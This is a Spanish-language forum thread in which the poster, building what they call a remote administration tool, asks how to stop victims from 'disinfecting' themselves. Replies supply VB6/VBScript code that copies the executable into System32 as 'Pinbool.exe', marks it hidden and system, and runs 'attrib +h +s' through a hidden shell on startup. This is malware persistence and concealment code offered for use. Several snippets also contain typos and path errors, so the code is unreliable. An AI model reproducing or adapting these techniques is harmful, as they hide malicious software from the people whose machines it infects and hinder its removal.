Wolas, haciendo mi herramienta de administracion remota me he dado cuenta de qe es muy facil desinfectarse, unicamente matando el proceso, y luego borrandola del system32. Aparte de ocultarla del administrador de tarreas tambien he estado buscado sobre como copiarla en modo de archivo oculto y/o ponerle algo para qe no se pueda borrar facilmente
Set obj = CreateObject("Scripting.FileSystemObject")
FileCopy App.path & App.EXEName & ".exe", "C:/Windows/System32/Pinbool.exe"
Me suena qe para coprlo como oculto era /f o algo asi, como en los *.bat, pro no macuerdo...
CitarSetAttr "C:/Windows/System32/Pinbool.exe", vbHidden
Tambien puedes ocultarlo posteriormente con la api SetFileAttributes
Set obj = CreateObject("Scripting.FileSystemObject")
FileCopy App.path & App.EXEName & ".exe", "C:/Windows/System32/Pinbool.exe"
set copya = obj.GetFile "C:\Windows\System32\Pinbool.exe"
copya.attributes = 2+4
ahi un comando dos que sirve para dar atributos de ocultos a archivos ejemplo
Private Sub Form_Load()
Dim yo
yo = App.paht & "\" & App.EXEName & ".exe" '<--donde nos 'ejecutamos
FileCopy yo, "c:\miprograma.exe" ' nos copiamos a c:\ solo como ejemplo
atributos '<--- llamamos
End Sub
Sub atributos()
Dim a
Dim b '<--- declaramos variables
Dim c
a = "command /c attrib +h +s" ' pasamos parametros al comenado q ejecutaremos
b = "c:\miprograma.exe"
c = a + b
Shell (c), vbHide ' LO EJECUTAMOS
End Sub